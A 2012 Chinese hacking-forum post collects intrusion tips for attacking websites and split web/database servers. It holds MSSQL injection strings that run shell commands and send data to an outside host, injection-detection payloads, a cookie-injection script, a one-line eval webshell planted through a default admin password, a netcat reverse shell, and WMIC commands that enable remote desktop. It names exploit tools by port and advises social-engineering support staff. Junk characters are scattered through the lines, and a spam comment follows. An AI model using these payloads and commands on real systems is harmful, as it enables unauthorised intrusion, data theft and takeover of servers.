中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关
" K! n; x! n( N& L8 N, m9 Z" i9 L. `9 s2 k

/ b9 D8 h% h( k9 P+ ~SA点数据库分离搞法+语句:: V+ X; Z7 A7 C( J

5 W. v: g0 ?% a5 C1 D% d+ ?注射点不显错,执行下面三条语句页面都返回正常。+ R; \7 J- C; z5 s' b
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
5 W4 a! q7 v6 o# c: y& ?) ^and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
; q* c. c  \1 D0 Iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'), ]' N/ ], U+ b1 a% }; ~) p
可以列目录,判断系统为2000,web与数据库分离
1 `; E  w7 d' P遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。; e$ b; Q- ~% e" E$ Z& t* b) O
在注射点上执行
* E+ Y# g3 ^! t6 @' k( q* Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
" K5 F7 c6 r5 {1 e3 P- ]# G页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
, F3 {( D7 {7 ]- o' ]5 P3 z还有我用NC监听得其他端口都没有得到IP。- X7 g5 z0 p( |& j, ?9 k

. @" _6 T; o5 B通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。1 Y8 @4 f" G0 S$ D' g
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--# d# H6 Z& ~% ^# k! N1 a8 [. Y% P8 l

) D* ?/ i# g" z- R: l: U$ Z;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--8 E- t) S/ k' z) A

" F: B  O) s% U( o; w现在就猜想是不是数据库是内网而且不能连外网。
4 d* W4 m; Y0 y" ]( F& l" x# J
$ M& N; ^3 _- r" |* p2 f
+ |7 e; U& K4 B6 k  ]' P; Qaccess导出txt文本代码
+ L% R! N" h- m% c$ I$ r% aSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
- ]- s" e5 R! V; Q* M/ k6 ~* g4 t% C: T, k! z1 B7 l1 c! T
* }; a5 V5 r, [( o; `* @
- [+ L2 r$ |" u  y  g' r
自动跳转到指定网站代码头$ h/ E% [3 F( n& c7 C
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>, b# N' l8 z; L7 n$ ]; M

3 F1 E" V  \' j( ?, v7 N" v$ q. Y8 h5 ]
入侵java or jsp站点时默认配置文件路径:
9 t* c4 l: p7 a$ \\web-inf\web.xml
* D# T( d- F9 q0 a1 W) @tomcat下的配置文件位置:
$ S# G) u$ x4 Y8 w  g8 z\conf\server.xml            (前面加上tomcat路径)
) n7 k3 Q! v2 M! t  R% G% Y\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
, o& C3 z3 J6 q) I
- K4 T- F$ b5 ]$ [; f
1 }9 s; k5 T( S2 X$ q- x5 B# i! N' n4 v7 G( E4 S4 }
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:8 g3 Y- E6 B  y5 _
-1%23
+ t- k: o! c0 a  E/ }1 d>
! k5 a! N4 n' M: D' u<
( V3 K  u! s( j1'+or+'1'='1
2 z0 g2 V; A5 k! m: \id=8%bf
5 N+ e/ M3 D) q* {" v1 z+ M5 E) }% b% U9 _
全新注入点检测试法:
$ J7 |/ ?. r9 I3 L8 y& ?1 I$ S在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
$ ~- {! T+ a4 O8 i2 \4 s
! a! y- I  M) g4 T: B0 T在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。/ o! E8 C! j$ D
' }) K0 [, p' V7 [3 @, a4 F
搜索型注入判断方法:8 p; q. \3 |$ t% E' @2 P$ _
北京%' and '1'='1' and '%'='
4 r. P5 }6 {: f6 o' k2 [' E+ x北京%' and '1'='2' and '%'='4 l8 R2 f! j# B' o1 j. E

) S4 }  _; Z3 F; V: N3 F8 d
& m" J( x& }9 sCOOKIES注入:- Z# T7 j' e6 f, Q
2 X8 h- S. F' J% C; r
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
6 g4 ]  h9 _) `  a/ y& Q) ^2 q5 A4 P4 S8 {+ p3 D
2000专业版查看本地登录用户命令:
# [! e- ~  [. n3 N3 r9 Q( Z7 Unet config workstation/ N! G' f2 y1 w) X1 N7 a, J
; s( v* P; X4 B- j4 r# x

1 z; U' p. j. n$ [, d& I2003下查看ipsec配置和默认防火墙配置命令:
& C% ?0 R& ~$ B+ t" vnetsh firewall show config
( X7 N5 d7 w4 onetsh ipsec static show all& {0 ?% h- Z, s& k
3 m' V& {- {4 k8 t# ]  ^# J
不指派指定策略命令:* Z0 A, ]( g/ `$ A' H+ p
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)+ Z1 z. M4 \9 a% Z* f
netsh ipsec static show policy all  显示策略名
* H5 T: m! `3 R& a/ z3 j  n; B
& |" k% b5 |7 Q/ S7 E+ h4 s2 U+ Z8 @" v6 @6 z
猜管理员后台小技巧:
9 E+ W$ ~: v4 q4 [0 Q: iadmin/left.asp
1 y9 V. ?/ v) c) |% Wadmin/main.asp
* D! C) o8 R6 I2 O' A) ]/ F* a9 p+ Wadmin/top.asp
- V' q3 D) b% H9 nadmin/admin.asp
- r8 o! M, s( B9 j  o, X会现出菜单导航,然后迅雷下载全部链接
8 ^1 S3 i; G9 [6 @! p  r/ _. K
5 ]( {' l4 p  D" m3 t& }1 |" S, y1 [" H
社会工程学:) g; p& j$ Q3 F
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人) ]( P; c& [. D2 W* ~2 m, \( Q
然后去骗客服+ ~6 @/ A7 ]! y5 C, A2 [. u8 X/ D
; b, W) Z+ z4 n5 H

5 M3 I! H3 |; X& T统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
; w: F2 c- w* m0 i查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
9 T/ ^9 O; j" Q4 L! N1 X: r  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
7 w  m, N. g* U  j" Q3 K$ f' Z6 S$ U

' ~% u) O- |+ `% T* Z. J. x& i8 G$ Y
% A$ F  H4 u' g5 z6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)+ V& l( Q8 _2 `3 ^
$ J% n6 z) R% _( }
, C2 M. u$ E, _( H" Y4 }, g

! T6 C% x9 U& u3 O5 wCMD加密注册表位置
. y2 ?8 C% q0 J6 B2 l- u(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor, R' f5 L, H& I0 [5 |' b
AutoRun/ s* z; @. L" N

! h& S: h. f" _, X( A/ d  w(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
' z7 Y0 c- ]! O9 H: \AutoRun
, O4 ~* l; J! k4 i) m
- I8 M, g& D. G! i. _8 y: l
& Q4 G% h' a% u" c在找注入时搜索Hidden,把他改成test
$ f( Q; k( H+ t1 e8 V& ~. W& K+ d9 [, P# {. ]: n, n
# }. @  W  m8 O
& @8 \9 E- W1 W1 r. Q' n3 r8 `
mstsc /v:IP /console + |3 [- M; N2 [+ i7 S

0 N$ p/ g* K! i
2 h& I5 F5 e' ]- ^7 R: K一句话开3389:
6 s" F: F/ N7 C6 {+ v6 m7 |
1 _" D& [% r: m- \; _% c4 F" _最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  2 U8 a# e! }" |1 S
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.0 Y5 k. R1 l; D( |5 t

5 [" i3 E- |2 A6 c& Q
8 z  S# m4 F: N) f7 ^知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:1 ?6 a* V6 g0 D& ^& r
Insert into admin(user,pwd) values('test','test')* w) c6 b; K" G  `  i
" o+ E- k/ b5 u4 ^5 Z% D
. [3 o" b' M5 K4 l+ T
NC反弹
. X+ m8 p8 C* G9 i先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
" P4 q9 z) ~. O/ ^$ J然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
* a) M* `1 Z: _9 |8 u1 q6 g2 ]
& A, l* J0 |& o
3 }+ g( \5 y& M3 k  q在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
! F: b3 s1 x# {* |1 x. M
; ^3 z0 c; g4 ^% C有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录5 [, J4 {8 k6 Q
例如:% S9 U1 u3 ~% P3 l
subst k: d:\www\ 用d盘www目录替代k盘
7 z. f  K; p) _; o; w8 asubst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2